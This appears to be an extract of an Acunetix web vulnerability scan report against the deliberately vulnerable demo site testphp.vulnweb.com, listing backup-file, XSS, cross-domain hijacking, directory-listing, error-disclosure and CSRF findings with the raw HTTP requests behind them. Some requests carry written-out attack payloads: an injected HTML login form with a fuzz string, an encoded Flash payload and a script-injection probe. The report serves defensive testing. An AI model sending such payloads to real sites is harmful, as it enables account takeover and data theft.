<div%20id="content">%0D%0A%09<div%20class="story">%0D%0A%09<h3>If%20you%20are%20already%2
0registered%20please%20enter%20your%20login%20information%20below:</h3>
<br>%0D%0A%09<form%20name="loginform"%20method="post"%20action="userinfo.php">%0D%0A%09<t
able%20cellpadding="4"%20cellspacing="1">%0D%0A%09%09<tr><td>Username%20:%20</td><td>
<input%20name="uname"%20type="text"%20size="20"%20style="width:120px;"></td>
</tr>%0D%0A%09%09<tr><td>Password%20:%20</td><td>
<input%20name="pass"%20type="password"%20size="20"%20style="width:120px;"></td>
</tr>%0D%0A%09%09<tr><td%20colspan="2"%20align="right">
<input%20type="submit"%20value="login"%20style="width:75px;"></td>
</tr>%0D%0A%09</table>%0D%0A%09</form>%0D%0A%20%20%09</div>&ucc=777&uemail=matheusdaocu%4
0gmail.com&update=update&uphone=%2B555%20666666666&urname=12345'"\'\");|]*%00{%0d%0a<%00>
%bf%27'💡
Backup files
Severity Medium
Reported by module /Scripts/PerFile/Backup_File.script
Description
A possible backup file was found on your web-server. These files are usually created by developers to backup their work.
Impact
Backup files can contain script sources, configuration files or other sensitive information that may help an malicious user to
prepare more advanced attacks.
Recommendation
Remove the file(s) if they are not required on your website. As an additional step, it is recommended to implement a
security policy within your organization to disallow creation of backup files in directories accessible from the web.
References
98
Testing for Old, Backup and Unreferenced Files (OWASP-CM-006)
(https://www.owasp.org/index.php/Review_Old,_Backup_and_Unreferenced_Files_for_Sensitive_Information_(OTG-
CONFIG-004))
Security Tips for Server Configuration (http://httpd.apache.org/docs/1.3/misc/security_tips.html)
Protecting Confidential Documents at Your Site (http://www.w3.org/Security/Faq/wwwsf5.html)
Affected items
/index.bak
Details
This file was found using the pattern ${fileName}.bak.
Original filename: index.php
Pattern found:
99
<?PHP require_once("database_connect.php"); ?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideH
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2">
</head>
<body>
<div id="mainLayer" style="position:absolute; width:700px; z-index:1">
<div id="masthead">
<h1 id="siteName">ACUNETIX ART</h1>
<h6 id="siteInfo">TEST and Demonstration site for Acunetix Web Vulnerability Scanner</h
<div id="globalNav">
<a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="art
</a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a>
<a href="guestbook.php">guestbook</a>
</div>
</div>
<!-- end masthead -->
<div id="navBar">
<div id="search">
<form action="search.php" method="post">
<label>search art</label>
<input name="searchFor" type="text" size="10">
<input name="goButton" type="submit" value="go">
</form>
</div>
<div id="sectionLinks">
<ul>
<li><a href="categories.php">Browse categories</a></li>
<li><a href="artists.php">Browse artists</a></li>
<li><a href="cart.php">Your cart</a></li>
<li><a href="login.php">Signup</a></li>
<li><a href="userinfo.php">Your profile</a></li>
<li><a href="guestbook.php">Our guestbook</a></li>
<?PHP if (isset($_COOKIE["login"]))echo '<li><a href="../logout.php">Logout</a>
100
</ul>
</div>
<div class="relatedLinks">
<h3>Links</h3>
<ul>
<li><a href="http://www.acunetix.com">Security art</a></li>
<li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Expl
</ul>
</div>
<div id="advert">
<p><img src="images/add.jpg" alt="" width="107" height="66"></p>
</div>
</div>
Request headers
GET /index.bak HTTP/1.1
Range: bytes=0-99999
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
/index.zip
Details
This file was found using the pattern ${fileName}.zip.
Original filename: index.php
Request headers
101
GET /index.zip HTTP/1.1
Range: bytes=0-99999
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
Severity Medium
Reported by module /Scripts/PerScheme/XSS.script
Description
This page is possibly vulnerable to Cross domain data hijacking. If an attacker can create/upload a malicious Flash (SWF)
file or control the top part of any page he can perform an attack known as Cross domain data hijacking. The Content-
Type of the response doesn't matter. If the file is embedded using an <object> tag, it will be executed as a Flash file as long
as the content of the file looks like a valid Flash file.
There are many ways to perform this attack. The attacker doesn't need to upload a file. The only requirement is that an
attacker can control the data on a location of the target domain. One way is to abuse a JSONP API. Usually, the attacker
can control the output of a JSONP API endpoint by changing the callback parameter. However, if an attacker uses an entire
Flash file as callback, we can use it just like we would use an uploaded file in this attack.
Impact
An attacker can read any secrets (such as CSRF tokens) from the affected domain.
Recommendation
102
For file uploads: It is recommended to check the file's content to have the correct header and format. If possible, use
"Content-Disposition: attachment; filename=Filename.Extension;" header for the files that do not need to be served in the
web browser. Isolating the domain of the uploaded files is also a good solution as long as the crossdomain.xml file of the
main website does not include the isolated domain.
For other cases: For JSONP abuses or other cases when the attacker control the top part of the page, you need to perform
proper input filtering to protect against this type of issues.
References
Affected items
/hpp/params.php
Details
URL encoded GET input p was set to
CWS%07%0E000x%9C=%8D1N%C3%40%10E%DF%AE%8D%BDI%08)%D3%40%1D%A0%A2%05%09%11%89Hi
P"%05D%8BF%8E%0BG%26%1B%D9%8E%117%A0%A2%DC%82%8A%1Br%04X;!S%8C%FE%CC%9B%F9%FF
%AA%CB7Jq%AF%7F%ED%F2.%F8%01>%9E%18p%C9c%9Al%8B%ACzG%F2%DC%BEM%EC%ABdkj%1E%A
C%2C%9F%A5(%B1%EB%89T%C2Jj)%93"%DBT7%24%9C%8FH%CBD6)%A3%0Bx)%AC%AD%D8%92%FB%1F
%5C%07C%AC%7C%80Q%A7Nc%F4b%E8%FA%98%20b_%26%1C%9F5%20h%F1%D1g%0F%14%C1%0A]s%8D
%8B0Q%A8L<%9B6%D4L%BD_%A8w%7E%9D[%17%F3/[%DCm{%EF%CB%EF%E6%8D:n-
%FB%B3%C3%DD.%E3d1d%EC%C7%3F6%CD0%09.
The value is reflected at the top of the page.
Request headers
GET /hpp/params.php?
p=CWS%07%0E000x%9C=%8D1N%C3%40%10E%DF%AE%8D%BDI%08)%D3%40%1D%A0%A2%05%09%11%89HiP"%05D%8B
F%8E%0BG%26%1B%D9%8E%117%A0%A2%DC%82%8A%1Br%04X;!S%8C%FE%CC%9B%F9%FF%AA%CB7Jq%AF%7F%ED%F2
.%F8%01>%9E%18p%C9c%9Al%8B%ACzG%F2%DC%BEM%EC%ABdkj%1E%AC%2C%9F%A5(%B1%EB%89T%C2Jj)%93"%DB
T7%24%9C%8FH%CBD6)%A3%0Bx)%AC%AD%D8%92%FB%1F%5C%07C%AC%7C%80Q%A7Nc%F4b%E8%FA%98%20b_%26%1
C%9F5%20h%F1%D1g%0F%14%C1%0A]s%8D%8B0Q%A8L<%9B6%D4L%BD_%A8w%7E%9D[%17%F3/[%DCm{%EF%CB%EF%
E6%8D:n-%FB%B3%C3%DD.%E3d1d%EC%C7%3F6%CD0%09 HTTP/1.1
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
Severity Medium
103
Reported by module /Scripts/PerScheme/XSS.script
Description
Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code (usually in the
form of Javascript) to another user. Because a browser cannot know if the script should be trusted or not, it will execute the
script in the user context allowing the attacker to access any cookies or session tokens retained by the browser.
Impact
Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable application to fool a user in
order to gather data from them. An attacker can steal the session cookie and take over the account, impersonating the
user. It is also possible to modify the content of the page presented to the user.
Recommendation
References
Affected items
/showimage.php
Details
This type of XSS can only be triggered on (and affects) content sniffing browsers.
104
GET /showimage.php?file=./pictures/1.jpg'"()%26%25<acx><ScRiPt%20>R56e(9502)
</ScRiPt>&size=160 HTTP/1.1
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
Directory listing
Severity Medium
Reported by module /Scripts/PerFolder/Directory_Listing.script
Description
The web server is configured to display the list of files contained in this directory. This is not recommended because the
directory may contain files that are not normally exposed through links on the web site.
Impact
A user can view a list of all files from this directory possibly exposing sensitive information.
Recommendation
You should make sure the directory does not contain sensitive information or you may want to restrict directory listings from
the web server configuration.
References
Affected items
/.idea/
Verified vulnerability
Details
Pattern found:
<title>Index of /.idea/</title>
Request headers
105
GET /.idea/ HTTP/1.1
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
/.idea/scopes/
Verified vulnerability
Details
Pattern found:
<title>Index of /.idea/scopes/</title>
Request headers
GET /.idea/scopes/ HTTP/1.1
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
/_mmServerScripts/
Verified vulnerability
Details
Pattern found:
<title>Index of /_mmServerScripts/</title>
Request headers
106
GET /_mmServerScripts/ HTTP/1.1
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
/admin/
Verified vulnerability
Details
Pattern found:
<title>Index of /admin/</title>
Request headers
GET /admin/ HTTP/1.1
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
/Connections/
Verified vulnerability
Details
Pattern found:
<title>Index of /Connections/</title>
Request headers
107
GET /Connections/ HTTP/1.1
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
/CVS/
Verified vulnerability
Details
Pattern found:
<title>Index of /CVS/</title>
Request headers
GET /CVS/ HTTP/1.1
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
/Flash/
Verified vulnerability
Details
Pattern found:
<title>Index of /Flash/</title>
Request headers
108
GET /Flash/ HTTP/1.1
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
/images/
Verified vulnerability
Details
Pattern found:
<title>Index of /images/</title>
Request headers
GET /images/ HTTP/1.1
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
/Mod_Rewrite_Shop/images/
Verified vulnerability
Details
Pattern found:
<title>Index of /Mod_Rewrite_Shop/images/</title>
Request headers
109
GET /Mod_Rewrite_Shop/images/ HTTP/1.1
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
/pictures/
Verified vulnerability
Details
Pattern found:
<title>Index of /pictures/</title>
Request headers
GET /pictures/ HTTP/1.1
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
/Templates/
Verified vulnerability
Details
Pattern found:
<title>Index of /Templates/</title>
Request headers
110
GET /Templates/ HTTP/1.1
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
/wvstests/
Verified vulnerability
Details
Pattern found:
<title>Index of /wvstests/</title>
Request headers
GET /wvstests/ HTTP/1.1
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
/wvstests/pmwiki_2_1_19/
Verified vulnerability
Details
Pattern found:
<title>Index of /wvstests/pmwiki_2_1_19/</title>
Request headers
111
GET /wvstests/pmwiki_2_1_19/ HTTP/1.1
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
/wvstests/pmwiki_2_1_19/scripts/
Verified vulnerability
Details
Pattern found:
<title>Index of /wvstests/pmwiki_2_1_19/scripts/</title>
Request headers
GET /wvstests/pmwiki_2_1_19/scripts/ HTTP/1.1
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
Severity Medium
Reported by module /Scripts/PerFile/Text_Search_File.script
Description
Application error or warning messages may expose sensitive information about an application's internal workings to an
attacker.
Acunetix found an error or warning message that may disclose sensitive information. The message may also contain the
location of the file that produced an unhandled exception. Consult the 'Attack details' section for more information about the
affected page.
112
Impact
Error messages may disclose sensitive information which can be used to escalate attacks.
Recommendation
Verify that this page is disclosing error or warning messages and properly configure the application to log errors to a file
instead of displaying the error to the user.
References
Affected items
/AJAX/infoartist.php
Details
Pattern found:
Request headers
GET /AJAX/infoartist.php HTTP/1.1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: aspectalerts
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest;mycookie=3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
/AJAX/infocateg.php
Details
Pattern found:
Request headers
113
GET /AJAX/infocateg.php HTTP/1.1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: aspectalerts
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest;mycookie=3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
/AJAX/infotitle.php
Details
Pattern found:
Request headers
GET /AJAX/infotitle.php HTTP/1.1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: aspectalerts
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest;mycookie=3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
/Connections/DB_Connection.php
Details
114
Pattern found:
Fatal error
Request headers
GET /Connections/DB_Connection.php HTTP/1.1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: aspectalerts
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
/pictures/path-disclosure-unix.html
Details
Pattern found:
<b>Warning</b>: Sablotron error on line 1: XML parser error 3: no element found in <b>/u
Request headers
115
GET /pictures/path-disclosure-unix.html HTTP/1.1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: aspectalerts
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
/secured/database_connect.php
Details
Pattern found:
Request headers
GET /secured/database_connect.php HTTP/1.1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: aspectalerts
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
116
Severity Medium
Reported by module /Crawler/12-Crawler_Form_NO_CSRF.js
Description
Cross-Site Request Forgery (CSRF, or XSRF) is a vulnerability wherein an attacker tricks a victim into making a request the
victim did not intend to make. Therefore, with CSRF, an attacker abuses the trust a web application has with a victim's
browser.
Acunetix found an HTML form with no apparent anti-CSRF protection implemented. Consult the 'Attack details' section for
more information about the affected HTML form.
Impact
An attacker could use CSRF to trick a victim into accessing a website hosted by the attacker, or clicking a URL containing
malicious or unauthorized requests.
CSRF is a type of 'confused deputy' attack which leverages the authentication and authorization of the victim when the
forged request is being sent to the web server. Therefore, if a CSRF vulnerability could affect highly privileged users such
as administrators full application compromise may be possible.
Recommendation
Verify if this form requires anti-CSRF protection and implement CSRF countermeasures if necessary.
The recommended and the most widely used technique for preventing CSRF attacks is know as an anti-CSRF token, also
sometimes referred to as a synchronizer token. The characteristics of a well designed anti-CSRF system involve the
following attributes.
When a user submits a form or makes some other authenticated request that requires a Cookie, the anti-CSRF token
should be included in the request. Then, the web application will then verify the existence and correctness of this token
before processing the request. If the token is missing or incorrect, the request can be rejected.
References
Affected items
Web Server
Details
117
Form name: <empty>
Form action: search.php?test=query
Form method: POST
Form inputs:
searchFor [text]
goButton [submit]
Request headers
GET / HTTP/1.1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
/404.php
Details
Form name: <empty>
Form action: search.php?test=query
Form method: POST
Form inputs:
searchFor [text]
goButton [submit]
Request headers
118
GET /404.php HTTP/1.1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: aspectalerts
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
/artists.php
Details
Form name: <empty>
Form action: search.php?test=query
Form method: POST
Form inputs:
searchFor [text]
goButton [submit]
Request headers
119
GET /artists.php HTTP/1.1
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: aspectalerts
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
/cart.php
Details
Form name: <empty>
Form action: search.php?test=query
Form method: POST
Form inputs:
searchFor [text]
goButton [submit]
Request headers
120
POST /cart.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: aspectalerts
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 19
Host: testphp.vulnweb.com
Connection: Keep-alive
addcart=1&price=500
/categories.php
Details
Form name: <empty>
Form action: search.php?test=query
Form method: POST
Form inputs:
searchFor [text]
goButton [submit]
Request headers
121
GET /categories.php HTTP/1.1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: aspectalerts
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
/comment.php
Details
Form name: fComment
Form action: comment.php
Form method: POST
Form inputs:
name [text]
comment [textarea]
Submit [submit]
phpaction [hidden]
Request headers
122
GET /comment.php?aid=1 HTTP/1.1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: aspectalerts
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
/disclaimer.php
Details
Form name: <empty>
Form action: search.php?test=query
Form method: POST
Form inputs:
searchFor [text]
goButton [submit]
Request headers
123
GET /disclaimer.php HTTP/1.1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: aspectalerts
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
/guestbook.php
Details
Form name: <empty>
Form action: search.php?test=query
Form method: POST
Form inputs:
searchFor [text]
goButton [submit]
Request headers
124
GET /guestbook.php HTTP/1.1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: aspectalerts
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
/guestbook.php
Details
Form name: faddentry
Form action: <empty>
Form method: POST
Form inputs:
name [hidden]
text [textarea]
submit [submit]
Request headers
125
GET /guestbook.php HTTP/1.1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: aspectalerts
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
/hpp/
Details
Form name: <empty>
Form action: params.php?p=valid&pp=12
Form method: GET
Form inputs:
aaaa [submit]
Request headers
126
GET /hpp/?pp=12 HTTP/1.1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: aspectalerts
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
/index.php
Details
Form name: <empty>
Form action: search.php?test=query
Form method: POST
Form inputs:
searchFor [text]
goButton [submit]
Request headers
127
GET /index.php HTTP/1.1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: aspectalerts
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
/listproducts.php
Details
Form name: <empty>
Form action: search.php?test=query
Form method: POST
Form inputs:
searchFor [text]
goButton [submit]
Request headers
128
GET /listproducts.php?cat=1 HTTP/1.1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: aspectalerts
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
/login.php
Details
Form name: <empty>
Form action: search.php?test=query
Form method: POST
Form inputs:
searchFor [text]
goButton [submit]
Request headers
129
GET /login.php HTTP/1.1
Host: testphp.vulnweb.com
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
X-WVS-ID: Acunetix-LSR/65535
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,app
lication/signed-exchange;v=b3
Referer: http://testphp.vulnweb.com/
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.9
Connection: keep-alive
/login.php
Details
Form name: loginform
Form action: userinfo.php
Form method: POST
Form inputs:
uname [text]
pass [password]
<empty> [submit]
Request headers
130
GET /login.php HTTP/1.1
Host: testphp.vulnweb.com
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
X-WVS-ID: Acunetix-LSR/65535
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,app
lication/signed-exchange;v=b3
Referer: http://testphp.vulnweb.com/
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.9
Connection: keep-alive
/product.php
Details
Form name: <empty>
Form action: search.php?test=query
Form method: POST
Form inputs:
searchFor [text]
goButton [submit]
Request headers
131
GET /product.php?pic=1 HTTP/1.1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: aspectalerts
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
/product.php
Details
Form name: f_addcart
Form action: cart.php
Form method: POST
Form inputs:
price [hidden]
addcart [hidden]
<empty> [submit]
Request headers
132
GET /product.php?pic=1 HTTP/1.1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: aspectalerts
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
/search.php
Details
Form name: <empty>
Form action: search.php?test=query
Form method: POST
Form inputs:
searchFor [text]
goButton [submit]
Request headers
133
POST /search.php?test=query HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: aspectalerts
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 25
Host: testphp.vulnweb.com
Connection: Keep-alive
goButton=go&searchFor=the
/signup.php
Details
Form name: <empty>
Form action: search.php?test=query
Form method: POST
Form inputs:
searchFor [text]
goButton [submit]
Request headers
134
GET /signup.php HTTP/1.1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: aspectalerts
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
/signup.php
Details
Form name: form1
Form action: /secured/newuser.php
Form method: POST
Form inputs:
uuname [text]
upass [password]
upass2 [password]
urname [text]
ucc [text]
uemail [text]
uphone [text]
uaddress [textarea]
signup [submit]
Request headers
135
GET /signup.php HTTP/1.1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: aspectalerts
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
/Templates/main_dynamic_template.dwt.php
Details
Form name: <empty>
Form action: ../search.php?test=query
Form method: POST
Form inputs:
searchFor [text]
goButton [submit]
Request headers
136
GET /Templates/main_dynamic_template.dwt.php HTTP/1.1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: aspectalerts
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
/userinfo.php
Details
Form name: <empty>
Form action: search.php?test=query
Form method: POST
Form inputs:
searchFor [text]
goButton [submit]
Request headers
137
POST /userinfo.php HTTP/1.1
Host: testphp.vulnweb.com
Content-Length: 20
Pragma: no-cache
Cache-Control: no-cache
Origin: http://testphp.vulnweb.com
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
X-WVS-ID: Acunetix-LSR/65535
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,app
lication/signed-exchange;v=b3
